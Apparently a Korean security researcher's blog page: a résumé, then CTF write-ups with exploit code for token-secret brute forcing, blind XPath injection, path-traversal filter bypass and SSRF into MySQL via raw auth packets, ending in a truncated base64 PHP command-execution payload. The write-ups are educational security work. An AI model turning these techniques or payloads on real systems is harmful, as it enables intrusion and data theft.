- KITRI 차세대보안리더 양성 프로그램 Whitehat School 멘토 (2023. 09. ~ )
- 구름톤 트레이닝 정보보호과정 멘토 (2023. 11. ~ )
- 금융보안원 전문강사 (2023 ~ )
- 가천대학교 스마트보안학과 자문위원 (2022 ~ )
- CTF Team Defenit (2019. 10. ~ ) - 라온시큐어 화이트햇 프로젝트팀 전임연구원 (2018. 04. ~ 2019. 08.) - 가천대학교 정보보호 동아리 Pay1oad 설립 및 운영 (2018. 03. ~ 2019. 02) - KITRI 차세대 보안리더 양성 프로그램 BoB(Best of the Best) 6기 컨설팅 트랙 수료 (2017. 07 ~ 2018. 04) - 가천대학교 글로벌캠퍼스 전산정보원 조교 근무 (2017.03 ~ 2017. 06) - AhnLab 소프트웨어 QA 모바일 팀 연수생 (2016. 08 ~ 2017. 02) - 대학 정보보호동아리 연합 커뮤니티 SUA(SecurityPlus Union Academy) 운영진 및 서경지부장 (2015. 11 ~ 2017. 06)
Interested with
- Penetration Testing
- Web Application Security
- Mobile Application Security
- Bug Hunting
- Finance Security
- Security Consulting
- Developing Tool
Bug Bounty
+ 한국인터넷진흥원(KISA) S/W 취약점 제보 00회
+ 네이버(NHN) 버그바운티 웹 취약점 제보 00회
> Unrestricted File Upload, Auth Bypass & CSRF Chaning for Logical Bugs, XXE, many Reflected XSS...
+ 리디북스(Ridibooks) 버그바운티 웹 취약점 제보 0회 > Account Takeover, Reflected XSS via Open Redirect
- 2020. 08. 금융보안원 대학생 금융보안 캠프 특강 - 2019. 08. Best of the Best 8기 컨설팅 트랙 특강 - '모의침투, 기술컨설팅' - 2019. 07. Best of the Best 8기 발대식 특강 - 2018. 11. KUCIS 영남권 컨퍼런스 발표 - 'Solidity 기반 스마트 컨트랙트 취약점 분석 방법' - 2018. 07. CodeEngn 2018 컨퍼런스 발표 - '안드로이드 앱 보안솔루션을 간단히 무력화 할 수 있다고?'
- 2018. 04. Codegate 2018 컨퍼런스 발표 - '안드로이드 간편결제 앱 취약점 분석을 통한 앱 보안성 향상 연구'
- 2017. 12. LG유플러스 모의해킹 결과 리포팅 발표 (BoB)
- 2017. 12. LG전자 서비스 취약점 분석 결과 리포팅 발표(BoB)
Achievements
- 2019. 09. 특허 등록 - "이중 패킹을 이용한 코드 난독화" (특허 제 10-2018960호)
- 2018. 12. 한국정보보호학회 동계학술대회 우수논문상 수상 (Mifare Classic 태그 타입 사용 출입 통제 시스템의 보안 취약점 및 대응방안에 대한 연구)
- 2018. 08. [KCI 등재] 한국정보보호학회 논문지 투고 - '안드로이드 간편결제 애플리케이션 보안 솔루션 결과값 변조를 통한 검증기능 우회 방법에 대한 연구'
- 2018. 04. KITRI 차세대 보안리더 양성 프로그램 BoB(Best of the Best) 6기 Best 10 (과학기술정보통신부 장관상)
- 2018. 04. KITRI 차세대 보안리더 양성 프로그램 BoB(Best of the Best) 6기 Grand Prix 팀 선정(Team. JGG)
getrandmax() 로 랜덤값을 뽑아 sha1으로 해싱하고 10바이트만 뽑아서 이를 다시 username과 붙여 sha256 해싱을 한다.
하지만 getrandmax는 21억가량밖에 안되기 때문에, 개인 pc로도 적은시간 안에 해시를 크랙해낼 수 있다.
from arang import *
xtoken = b"b0b32995820dad31a559a8611a610f9b3c57072b8fd757739c3605e50877d2fd"
for i in range(40000000,500000000):
xsecret = he(sha1(str(i)))[:20]
t = he(sha256(xsecret+b"guest"))
if xtoken == t:
print(xsecret)
break
if i % 10000000 == 0:
print(f"[+] {i} : {xsecret} {t}")
대충 이런식으로 해시를 크랙해보면 내 세션에 대한 xsecret값이 나타난다
이제 이 xsecret으로 valid한 admin x-token을 만들어내면 token auth를 우회할 수 있다.
요약 : blind xpath injection으로 catalina.properties에 설정된 environ variable leak
이제 jsp 문제 나오면 일단 톰캣, jdk부터 오디팅하는 습관이 들어져버렸다
대충 catalina.properties에 플래그 세팅해준거 보니 System.getProperty 같은 함수가 xpath 사용할 때 내부적으로 쓸거라 생각이 들어 우리의 갓-서브라임 형님께 ctrl+shift+f로 getProperty 검색해서 reference check를 했다
그러다보니 뭐 SecuritySupport.java에 쓰는게 있었는데 대충 기억해놓고있다가
대충 xpath function들 이용해서 풀거같아서 그쪽 보니 system-property라고 아주 좋아보이는 놈이 있었다.
from arang import *
s = requests.session()
proxies = {"http":"http://127.0.0.1:8888","https":"http://127.0.0.1:8888"}
headers = {"Cookie": "JSESSIONID=C37A435A55859F879AC71B4ECE966C07"}
s.proxies = proxies
s.headers = headers
s.verify = False
num = 1
#codegate
flag = "codegate2022{"
for i in range(len(flag)+1,46+1):
for c in "0123456789abcdef}":
url = f"http://3.39.79.180/blog/read?idx=' or @idx=string-length(substring(system-property('flag'),{i},1)='{c}'='true')-4 and @idx='1"
r = s.get(url)
if 'asdf' not in r.content.decode():
flag += c
print(f"[{len(flag)}/46] flag - {flag}")
break
do exploit
get flag
[ nft ]
요약 : blockchain 이지만 webchall, 1day랑 python trick 이용
modifier contains (string memory what, string memory where) {
bytes memory whatBytes = bytes (what);
bytes memory whereBytes = bytes (where);
require(whereBytes.length >= whatBytes.length);
bool found = false;
for (uint i = 0; i <= whereBytes.length - whatBytes.length; i++) {
bool flag = true;
for (uint j = 0; j < whatBytes.length; j++)
if (whereBytes [i + j] != whatBytes [j]) {
flag = false;
break;
}
if (flag) {
found = true;
break;
}
}
require (!found);
_;
}
A사는 최근 채팅서비스를 개발하여 제공하는 솔루션사 B사로부터 채팅서비스를 구매하여 A사의 서버와 통합하였는데...
A사의 내부 보안 취약점 분석팀 직원인 당신에게 이 통합된 채팅서비스가 안전한지 알아보라는 임무가 주어졌다.
채팅서비스 내부망 데이터베이스 유출 가능성이 있는지 내부 데이터베이스에 존재하는 Flag를 획득하여 증명해보자.
* 본 문제의 Flag는 총 3개입니다. 최종 Flag는 내부 데이터베이스의 flag 테이블에 존재합니다.
* 서버는 30분마다 초기화됩니다.
* 본 문제는 크롬 브라우저에 최적화 되어 있습니다.
문제 운영방법
시작 : nohup ./run.sh&
일시정지 : ./stop.sh
로그 : nohup ./logs.sh& 이후 tail -f ./logs.txt
run.sh 실행 시 30분마다 한번씩 서버가 전체 초기화되고 재실행됩니다.
문제 컨셉
전체 문제 서비스의 큰 틀은 채팅 서비스
여러 금융 기관의 취약점 분석 평가 도중 마주쳤던 채팅상담 서비스의 환경과 비슷한 맥락으로 구성
보통 외부의 채팅상담 서비스를 가져와 Integration을 하여 구현하는것이 보통
때문에 별도의 채팅상담 서비스 서버를 두고, 웹서버는 클라이언트와 채팅상담 서비스 사이를 중계해주는 역할을 수행
이러한 환경에서, 중계 서비스에 SSRF(Server Side Request Forgery) 취약점이 존재한다면 발생하는 위협이 핵심 문제 해결 포인트
잘못된 예외처리와 잘못된 필터링, 사용자로부터 전달받은 입력값으로 중요로직 처리 등으로 인하여 취약점들이 발생, 이들을 모두 엮어 문제 해결을 하여야 함
Client와 웹서버는 socketio를 통해 통신하고, 클라이언트로부터 전달받은 데이터를 파싱하여 내부망 채팅 api 서버로 전송
내부망 채팅 api 서버는 웹서버로부터 전달받은 데이터를 토대로 채팅 Database에 질의하여 그 결과를 다시 웹서버로 반환
웹서버는 반환받은 채팅 관련 데이터를 클라이언트로 전달
출제자 Write-Up
우선 문제에서 제공된 Dockerfile들을 보면 외부망, 내부망, 그리고 데이터베이스 이렇게 세개의 서버로 구성된것을 알 수 있다.
데이터베이스의 경우 5.7버전을 사용하고 있는것을 확인할 수 있다.
이러한 사항들을 주지하고 문제를 풀어나가야 한다.
외부망 소스코드 유출, 첫번째 플래그
우선 이미지를 보내는 기능을 살펴보면,
client단에서 data:image/png 형태로 변형하여 base64로 인코딩한채로 보낸다.
또한 filename 파라미터가 존재하는데, 해당 파라미터, 즉 파일명이 메세지 내용에 씌여지는것을 response되는 채팅 데이터를 통해 알 수 있다.
filename에 '와같은 일부 문자를 넣을 시 replace처리되어 파일명에서 사라지는것을 확인할 수 있다.
또한 ../와같이 상대경로로 이동할 수 있는 문자열 중 ..를 replace처리하는 것을 알 수 있다.
위 2개를 섞는다면 .'./와 같이 구성해보면 상대경로로 갈 수 있는 ../가 완성된다
이를 통해 filename 파라미터에 .'./.'./.'./.'./.'./.'./.'./.'./.'./.'./.'./etc/passwd와 같이 파일명을 주어 가입하게 되면 파일명은 ../../../../../../../../etc/passwd와 같이 변하게 된다.
upload error라고 나타나지만 실제 upload result를 살펴보면,
HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Access-Control-Allow-Credentials: true
Connection: close
Server: Werkzeug/2.0.1 Python/3.8.10
Date: Thu, 12 Aug 2021 10:40:43 GMT
42["uploadImageResult","[x] upload \"/app/ext_app/uploads/test/../../../../../../../../../../../etc/passwd\" error"]
위와같이 webroot 하위에 있는 절대경로가 노출된다.
그리고 새로고침하여 chat message들을 불러오면, 필터링을 우회하여 입력한 경로의 파일(지금은 /etc/passwd)을 읽어와 img tag에 넣어주는 것을 볼 수 있다.
이제 여기서 /app/ext_app/이 web server가 구동중인 path라고 가정하고 /app/ext_app/app.py를 filename 파라미터에 입력하게 되면 외부망 소스코드를 획득할 수 있다.
첫번째 flag 획득 fiesta{th1s_1s_the_st4rt_0f_th3_ch4ll3ng3}
내부망 소스코드 유출, 두번째 플래그
우선 회원가입할때 프로필 이미지를 업로드하는 루틴부터 살펴보면, file content를 내부망으로 socket 통신을 통해 전송하기 때문에 내부망 서버에 파일
16kb 미만의 프로필 이미지를 업로드하면 채팅할 때 프로필 이미지를 /getProfileImage?id={id} 형식으로 가져온다.
/getProfileImage의 response값을 살펴보면 content(data:image/png 형태로 변형된 이미지)와 filename(업로드한 파일명)이 서버로부터 전달된다.
register시 filename에 '와같은 일부 문자를 넣을 시 replace처리되어 파일명에서 사라지는것을 확인할 수 있다.
외부망 소스코드를 얻을때와 마찬가지로 .'./를 입력하면 ../가 된다.
이를 통해 register시 .'./.'./.'./.'./.'./.'./.'./.'./.'./.'./.'./etc/passwd와 같이 파일명을 주어 가입하게 되면 /etc/passwd가 누출될것이다
외부망 소스코드를 얻을때와 마찬가지로 response message에 절대경로가 노출되고 있다.
그리고 이렇게 에러가 나더라도 회원가입을 시도한 id와 pw로 로그인을 해보면 정상로그인 되는것을 확인할 수 있다.(잘못된 예외처리)
위와같이 로그인 후 /getProfileImage?id={userid}를 통해 ../../../../etc/passwd를 넣어 가입했던 id의 profile image에 /etc/passwd의 파일 내용이 담긴것을 확인할 수 있다.
외부망과 마찬가지로 노출되었던 절대경로를 바탕으로 /app/int_app/app.py를 누출해보면 내부망 소스코드와 두번째 플래그를 획득할 수 있다.
두번째 flag 획득 fiesta{cheerup!_y0u_c0uld_s0lve_the_l4st_p4rt!}
ssrf를 통해 mysql 임의 쿼리 실행, 마지막 플래그
이제 유출된 소스코드들을 통해 white-box로 분석할 수 있다.
외부망과 내부망은 서로 socket을 가지고 통신을한다. 이때 사용하는 socket은 세션을 유지하기 위해 외부망 flask의 users라는 dict에 각 session의 uuid를 key로하여 메모리내에서 관리한다.
# ext_app/app.py
def sessionCheck(loginCheck=False):
...
if flask.session["uuid"] not in users:
flask.session["host"] = ("172.22.0.4",9091)
print(f"[+] new socket conn {flask.session['uuid']}")
users[flask.session["uuid"]] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
users[flask.session["uuid"]].connect(flask.session["host"])
이러한 세션은 각 페이지 접근 시 sessionCheck함수를 통해 현재 세션을 가지고 있는지를 체크, 세션을 가지고 있지 않다면 session['host']에 172.22.0.4:9091(내부망)를 저장하고, 이를통해 socket을 연결한다.
# ext_app/app.py
@socket_io.on("join")
def join(content):
channel = content['channel']
userid = content['userid']
if flask.session["userid"] == userid and flask.session["uuid"] == channel:
if 'chatserver' in content:
if flask.session["uuid"] in users:
users[flask.session["uuid"]].close()
chatserver = content['chatserver']
t = chatserver.split(':')
flask.session["host"] = (t[0], int(t[1]))
users[flask.session["uuid"]] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
users[flask.session["uuid"]].connect(flask.session["host"])
flask.session["channel"] = channel
flask_socketio.join_room(channel)
sioemit("join",{"result":"success"}, channel)
else:
sioemit("join",{"result":"fail"}, channel)
하지만 socket.io가 "join"으로 emit할때, client에서 요청하는 파라미터 중 chatserver라는 파라미터가 있을 시, 해당 파라미터를 통하여 session["host"]를 재설정하고, 이를 토대로 다시 socket connection을 맺는다.
/* exploit.js */
var sock = io.connect(`ws://52.78.132.206:9090/`);
sock.on('connect', function(){
var data = {'channel':uuid, 'userid':userid, 'chatserver': '172.22.0.5:3306'};
sock.emit("join",data);
});
따라서 위와같이 join namespace에 emit할 때 요청되는 파라미터 중 chatserver 파라미터를 통해 임의 호스트와 포트에 raw packet을 송신할 수 있는 SSRF 취약점이 발생하게 된다.
# int_app/app.py
class mysqlapi:
def __init__(self):
self.conn = pymysql.connect(
user = 'chatdb_admin',
passwd = 'th1s_1s_ch4tdb_4dm1n_p4ssw0rd',
host = '172.22.0.5',
db = 'chatdb',
charset = 'utf8'
)
내부망 app.py에는 db connection을 맺는 정보가 나와있다. 따라서 mysql client가 mysql server와 맺는 connection 과정을 그대로 맺은 후 query를 전송하면 전송된 query의 결과를 돌려줄 것이다.
# ext_app/app.py
@socket_io.on("chatsend")
def chatsend(content):
if not sessionCheck(loginCheck=True):
resp = "[x] please login"
sioemit("newchat", resp, flask.session["channel"])
return
if "sendtome" in content:
sendtome_flag = True
else:
sendtome_flag = False
try:
if type(content) != dict:
content = content.encode('latin-1')
content = json.loads(content)
if content["from"] != flask.session["userid"]:
print(f"[x] {content['from']} != {flask.session['userid']}")
return "[x] request from user is different from session"
if content["msg"] == "":
return "[x] blank content. please input content"
except Exception as e:
pass
resp = socksend(users[flask.session["uuid"]], content)
if sendtome_flag:
sioemit("newchat", resp, users[flask.session["userid"]])
else:
sioemit("newchat", resp, users[resp["to"]])
sioemit("newchat", resp, users[resp["from"]])
SSRF를 트리거하여 raw packet을 전송하려면 잘못 처리된 예외처리 구문을 이용하여야한다
본래 client에서 정상적인 요청이라면, json 형식으로 올바르게 전송될 것이다. json형식에 맞지 않는 content가 전송될 경우 content = json.loads(content)에서 exception이 발생하여 exception 처리 구문으로 가게된다.
그런데 여기서 except 처리구문에는 아무 동작 없이 pass만 하고 지나간다. 따라서 에러가 발생한 이전 라인인 content = content.encode('latin-1')이 실행된 채로 content 변수에 사용자의 input이 그대로 남아있게 되고, 이는 그대로 resp = socksend(users[flask.session["uuid"]], content)구문의 인자로 넘어가 전송되게된다.
따라서 임의의 원하는 raw packet을 socket을 통해 전송할 수 있는것이다.
하지만 전송 후 받는 응답을 클라이언트로 잘 전달해야하는데, 나에게 보낼 경우 users dict의 key로 flask.session["userid"]를 사용하는것에 비해, 나에게 보내지 않을 경우 송신자와 수신자 양쪽의 socket io channel에 전송하기 위하여 socket 전송의 결과를 가져와 거기서 송신자와 수신자를 파싱하게 된다.
우리가 mysql에 직접 raw packet을 보내고 받는 응답값에는 당연히 송신자와 수신자 정보가 존재하지 않기 때문에 sendtome_flag가 활성화 되어야만 raw packet 전송에 대한 응답값을 클라이언트로 수신할 수 있다.
sendtome_flag는 content에 sendtome가 있는지 검사하는 if "sendtome" in content:라는 조건문에서 세팅되는데, content가 json이었다면 content dictionary에 sendtome라는 key가 존재하는지 검사하는 조건문이 되었겠지만, raw packet으로 보낼때는 string형의 content에 sendtome라는 단어가 존재하는지 검사하는 조건문이 되기 때문에 packet 안에 sendtome가 들어가기만 하면 나에게 보내는 분기를 활성화시킬 수 있다.
이제 mysql conneciton 과정을 raw packet으로 재현해야하는데,
우리가 흔히 아는 Gopherous로 payload를 만드는 경우는 mysql connection 시 password가 없을 때이다. password가 존재할 경우, mysql-server에서 authentication 방식을 어떤것으로 설정해놓았는지를 보아야 하는데, mysql 5버전의 경우 mysql_native_password를 사용한다. (8.0 이상의 경우 caching_sha2_password를 사용한다)
주어진 Dockerfile에서 mysql 버전이 5.7인것을 확인했기 때문에, SSRF를 통해 mysql connection을 재현하기 위해선 mysql_native_password의 구성 원리와 connection 과정을 이해하여야한다.
(if password match) send mysql query -> receive query result
SHA1( password ) XOR SHA1( "20-bytes random data from server(seed)" + SHA1( SHA1( password ) ) )
1번단계에서 서버로부터 seed를 받아 이와 db password를 엮어 위와 같은 해시를 생성 후 2번단계에서 서버에 전송, 그 응답값을 확인하게된다.
따라서 위와같은 과정들을 거치도록 raw packet을 구성하면 되는데, 문제는sendtome, 즉 나에게 보내기 기능이 활성화 되어야 에러없이 raw packet send의 response를 받아올 수 있기 때문에, 각 단계의 패킷마다 "sendtome" 라는 문자열이 들어가야한다는 것이다.
0. server greeting (connection 시 서버가 전송)
1. send login request -> receive server seed
2. send mysql_native_password hash->receive auth ok
3. (if password match) send mysql query -> receive query result
mysql에서 packet을 주고받는것은 network에서 Application Layer에 해당하는데, mysql이 패킷을 주고받는 특성상, 이어지는 여러개의 패킷을 한번에 보내도록 구성한다거나("AAAABBBBCCCC"), 하나의 패킷을 두개로 쪼개 전송("AA","AA")하는등의 동작이 가능하다.
이점을 이용하여 상기 단계로 구성되는 mysql connection & query packet을 sendtome라는 문자열이 각 패킷에 들어갈 수 있게 구성하여야하는데, 중간에 server seed를 받아와 이를 통해 password hash를 생성해야하는 과정이 들어가있기 때문에 최소 2단계 이상으로 패킷을 나누어 구성하되 sendtome 문자열이 패킷안에 들어가게끔 해야한다.
다만 현재 socket을 통해 데이터를 주고받는 과정이 send->recv->send->recv 와 같이 1:1로만 주고받고 있기 때문에, 1번단계에서 login request를 보내더라도 첫 recv에선 connection시 서버가 전송하는 server greeting 패킷이 수신되게 된다.
따라서 server seed를 받아오기 위해선 send 이후 recv가 두번 실행되어야 하는데, 이를 이루기 위하여 위에서 설명한 하나의 패킷을 두개로 쪼개 전송("AA","AA")하는 방법을 사용한다.
mysql raw packet의 맨 앞 3바이트는 뒤에 올 패킷의 length인데, 이를 적절히 변조하여 마지막 sendtome 8byte만 빼고 보냄으로써 TCP segment of a reassembled PDU 를 유도하고, send -> recv -> (send, 원래 첫번째패킷) -> recv가 되도록 만들어준다.
async function step2(serverSeed){
//// mysql native password hashing process
// SHA1( password ) XOR SHA1( "20-bytes random data from server" <concat> SHA1( SHA1( password ) ) )
console.log("[+] seed "+btoa(serverSeed));
var sp = await sha1(password);
var ssp = await sha1(convertFromHex(sp))
var sssp = await sha1(serverSeed+convertFromHex(ssp))
console.log("[+] sssp "+btoa(sssp));
var hashedPassword = xor( convertFromHex(sp), convertFromHex(sssp) );
console.log("[+] hashed password "+btoa(hashedPassword))
var p1 = "\x14\x00\x00\x03"+hashedPassword
var query = "select * from flag#sendtome";
var p2 = `${String.fromCharCode(query.length+9)}\x00\x00\x00\x03${query}`
var packet = p1+p2;
setTimeout(function(){console.log("send 3 round");sock.emit("chatsend", packet);},500)
setTimeout(function(){console.log("send 4 round");sock.emit("chatsend", "sendtome");},1500)
}
이로써 server seed를 얻었으므로 내부망 코드에서 알아낸 db 패스워드와 server seed를 조합하여 패스워드 해시를 만들어낸다.
이번엔 두개의 패킷을 하나로 합쳐 한번에 보내는것으로("AAAABBBB") 패스워드 해시를 보내는 패킷과 query request 패킷을 하나로 합쳐보내며 query request 패킷의 요청 길이를 조작하여 sendtome(8byte)를 보낼 길이만큼 설정한다
query를 select * from flag#sendtome와 같이 끝에 주석처리를하여 뒤에 sendtome가 오더라도 정상적인 쿼리가 되도록 세팅 후 보내면, 서버와 주고받는 과정으로 flag가 날아오게된다
설명이 너무 복잡하여 그림과 글로 요약하면 아래와 같다.```
[TCP reassemble A] login request 전송
[TCP reassemble A] sendtome(8byte) 전송
[B] password hash + [TCP reassemble C] query request(+#sendtome) 전송
[TCP reassemble C] sendtome(8byte) 전송
최종 Exploit Code 및 마지막 Flag
마지막 플래그 fiesta{mysql_int3rner_1s_s0_fun_isnt_1t?}
// author(arang)'s writeup
function ab2str(buf) {
return new TextDecoder().decode(buf)
}
function Latin1ToUint8Array(iso_8859_1){
var uInt8Arr = new Uint8Array(iso_8859_1.length);
for(var i=0; i<iso_8859_1.length; i++){
uInt8Arr[i] = iso_8859_1.charCodeAt(i);
}
return uInt8Arr;
}
function xor(key, phrase){
var r = "";
for(var i=0; i<phrase.length; i++){
r += String.fromCharCode( key.charCodeAt(i%key.length) ^ phrase.charCodeAt(i) );
}
return r;
}
function convertFromHex(hex) {
var hex = hex.toString();
var str = '';
for (var i = 0; i < hex.length; i += 2)
str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
return str;
}
function addScript(cdnurl){
var cjs_script = document.createElement("script");
cjs_script.setAttribute('src',cdnurl);
document.body.insertBefore(cjs_script,document.body.firstChild);
}
async function sha1(message) {
const msgUint8 = Latin1ToUint8Array(message);
const hashBuffer = await Crypto.SHA1(msgUint8, {asBytes: true});
const hashArray = Array.from(new Uint8Array(hashBuffer));
const hashHex = hashArray.map(b => b.toString(16).padStart(2, '0')).join('');
return hashHex;
}
function step1(){
// step 1
//b'\xcb\x00\x00\x01\x8d\xa2\xbf\t\x00\x00\x00\x01\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00chatdb_admin\x00\x00chatdb\x00caching_sha2_password\x00t\x04_pid\x0516419\t_platform\x06x86_64\x03_os\x05Linux\x0c_client_name\x08libmysql\x07os_user\x05arang\x0f_client_version\x068.0.23\x0cprogram_name\x05sendtome'
p1 = convertFromHex("cb0000018da2bf0900000001ff00000000000000000000000000000000000000000000006368617464625f61646d696e00006368617464620063616368696e675f736861325f70617373776f72640074045f706964053136343139095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f75736572056172616e670f5f636c69656e745f76657273696f6e06382e302e32330c70726f6772616d5f6e616d650573656e64746f6d65")
setTimeout(function(){console.log("send 1 round");sock.emit("chatsend", p1);},500)
setTimeout(function(){console.log("send 2 round");sock.emit("chatsend", "sendtome");},1500)
}
async function step2(serverSeed){
//// mysql native password hashing process
// SHA1( password ) XOR SHA1( "20-bytes random data from server" <concat> SHA1( SHA1( password ) ) )
console.log("[+] seed "+btoa(serverSeed));
var sp = await sha1(password);
var ssp = await sha1(convertFromHex(sp))
var sssp = await sha1(serverSeed+convertFromHex(ssp))
console.log("[+] sssp "+btoa(sssp));
var hashedPassword = xor( convertFromHex(sp), convertFromHex(sssp) );
console.log("[+] hashed password "+btoa(hashedPassword))
var p1 = "\x14\x00\x00\x03"+hashedPassword
var query = "select * from flag#sendtome";
var p2 = `${String.fromCharCode(query.length+9)}\x00\x00\x00\x03${query}`
var packet = p1+p2;
setTimeout(function(){console.log("send 3 round");sock.emit("chatsend", packet);},500)
setTimeout(function(){console.log("send 4 round");sock.emit("chatsend", "sendtome");},1500)
}
var round = 0;
var sock = io.connect(`ws://52.78.132.206:9090/`);
sock.on('connect', function(){
var data = {'channel':uuid, 'userid':userid, 'chatserver': '172.22.0.5:3306'};
sock.emit("join",data);
});
sock.on('join', function(data){
console.log(data)
if(data["result"] == "fail"){
alert("join room fail")
}
})
// when get a new chat message
sock.on('newchat', function(data){
var result = data;
console.log("[+] newchat "+result);
round += 1
if (round == 2){
console.log("[+] yeah! I got the server seed")
var serverSeed = result.split("native_password\x00")[1].slice(0,-1);
step2(serverSeed);
}
})
var password = "th1s_1s_ch4tdb_4dm1n_p4ssw0rd";
addScript("https://arang.kr/sha1.js");
step1();
현재 php버전이 7.2.24니까 docker받아서 로컬테스트해보면 익스가 잘 되는것을 알 수 있다.
from arang import *
import re,sys,time
ex = urlencode('''PD9waHANCg0KcHduKCIkX0dFVFtjY2NdIik7DQoNCmZ1bmN0aW9uIHB3bigkY21kKSB7DQogICAgZ2xvYmFsICRhYmMsICRoZWxwZXIsICRiYWNrdHJhY2U7DQoNCiAgICBjbGFzcyBWdWxuIHsNCiAgICAgICAgcHVibGljICRhOw0KICAgICAgICBwdWJsaWMgZnVuY3Rpb24gX19kZXN0cnVjdCgpIHsgDQogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgDQogICAgICAgICAgICB1bnNldCgkdGhpcy0+YSk7DQogICAgICAgICAgICAkYmFja3RyYWNlID0gKG5ldyBFeGNlcHRpb24pLT5nZXRUcmFjZSgpOyANCiAgICAgICAgICAgIGlmKCFpc3NldCgkYmFja3RyYWNlWzFdWydhcmdzJ10pKSB7DQogICAgICAgICAgICAgICAgJGJhY2t0cmFjZSA9IGRlYnVnX2JhY2t0cmFjZSgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KDQogICAgY2xhc3MgSGVscGVyIHsNCiAgICAgICAgcHVibGljICRhLCAkYiwgJGMsICRkOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHN0cjJwdHIoJiRzdHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgICRhZGRyZXNzID0gMDsNCiAgICAgICAgZm9yKCRqID0gJHMtMTsgJGogPj0gMDsgJGotLSkgew0KICAgICAgICAgICAgJGFkZHJlc3MgPDw9IDg7DQogICAgICAgICAgICAkYWRkcmVzcyB8PSBvcmQoJHN0clskcCskal0pOw0KICAgICAgICB9DQogICAgICAgIHJldHVybiAkYWRkcmVzczsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwdHIyc3RyKCRwdHIsICRtID0gOCkgew0KICAgICAgICAkb3V0ID0gIiI7DQogICAgICAgIGZvciAoJGk9MDsgJGkgPCAkbTsgJGkrKykgew0KICAgICAgICAgICAgJG91dCAuPSBjaHIoJHB0ciAmIDB4ZmYpOw0KICAgICAgICAgICAgJHB0ciA+Pj0gODsNCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gJG91dDsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiB3cml0ZSgmJHN0ciwgJHAsICR2LCAkbiA9IDgpIHsNCiAgICAgICAgJGkgPSAwOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRuOyAkaSsrKSB7DQogICAgICAgICAgICAkc3RyWyRwICsgJGldID0gY2hyKCR2ICYgMHhmZik7DQogICAgICAgICAgICAkdiA+Pj0gODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGxlYWsoJGFkZHIsICRwID0gMCwgJHMgPSA4KSB7DQogICAgICAgIGdsb2JhbCAkYWJjLCAkaGVscGVyOw0KICAgICAgICB3cml0ZSgkYWJjLCAweDY4LCAkYWRkciArICRwIC0gMHgxMCk7DQogICAgICAgICRsZWFrID0gc3RybGVuKCRoZWxwZXItPmEpOw0KICAgICAgICBpZigkcyAhPSA4KSB7ICRsZWFrICU9IDIgPDwgKCRzICogOCkgLSAxOyB9DQogICAgICAgIHJldHVybiAkbGVhazsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBwYXJzZV9lbGYoJGJhc2UpIHsNCiAgICAgICAgJGVfdHlwZSA9IGxlYWsoJGJhc2UsIDB4MTAsIDIpOw0KDQogICAgICAgICRlX3Bob2ZmID0gbGVhaygkYmFzZSwgMHgyMCk7DQogICAgICAgICRlX3BoZW50c2l6ZSA9IGxlYWsoJGJhc2UsIDB4MzYsIDIpOw0KICAgICAgICAkZV9waG51bSA9IGxlYWsoJGJhc2UsIDB4MzgsIDIpOw0KDQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgJGVfcGhudW07ICRpKyspIHsNCiAgICAgICAgICAgICRoZWFkZXIgPSAkYmFzZSArICRlX3Bob2ZmICsgJGkgKiAkZV9waGVudHNpemU7DQogICAgICAgICAgICAkcF90eXBlICA9IGxlYWsoJGhlYWRlciwgMCwgNCk7DQogICAgICAgICAgICAkcF9mbGFncyA9IGxlYWsoJGhlYWRlciwgNCwgNCk7DQogICAgICAgICAgICAkcF92YWRkciA9IGxlYWsoJGhlYWRlciwgMHgxMCk7DQogICAgICAgICAgICAkcF9tZW1zeiA9IGxlYWsoJGhlYWRlciwgMHgyOCk7DQoNCiAgICAgICAgICAgIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA2KSB7IA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRkYXRhX2FkZHIgPSAkZV90eXBlID09IDIgPyAkcF92YWRkciA6ICRiYXNlICsgJHBfdmFkZHI7DQogICAgICAgICAgICAgICAgJGRhdGFfc2l6ZSA9ICRwX21lbXN6Ow0KICAgICAgICAgICAgfSBlbHNlIGlmKCRwX3R5cGUgPT0gMSAmJiAkcF9mbGFncyA9PSA1KSB7IA0KICAgICAgICAgICAgICAgICR0ZXh0X3NpemUgPSAkcF9tZW1zejsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KDQogICAgICAgIGlmKCEkZGF0YV9hZGRyIHx8ICEkdGV4dF9zaXplIHx8ICEkZGF0YV9zaXplKQ0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KDQogICAgICAgIHJldHVybiBbJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZV07DQogICAgfQ0KDQogICAgZnVuY3Rpb24gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSB7DQogICAgICAgIGxpc3QoJGRhdGFfYWRkciwgJHRleHRfc2l6ZSwgJGRhdGFfc2l6ZSkgPSAkZWxmOw0KICAgICAgICBmb3IoJGkgPSAwOyAkaSA8ICRkYXRhX3NpemUgLyA4OyAkaSsrKSB7DQogICAgICAgICAgICAkbGVhayA9IGxlYWsoJGRhdGFfYWRkciwgJGkgKiA4KTsNCiAgICAgICAgICAgIGlmKCRsZWFrIC0gJGJhc2UgPiAwICYmICRsZWFrIC0gJGJhc2UgPCAkZGF0YV9hZGRyIC0gJGJhc2UpIHsNCiAgICAgICAgICAgICAgICAkZGVyZWYgPSBsZWFrKC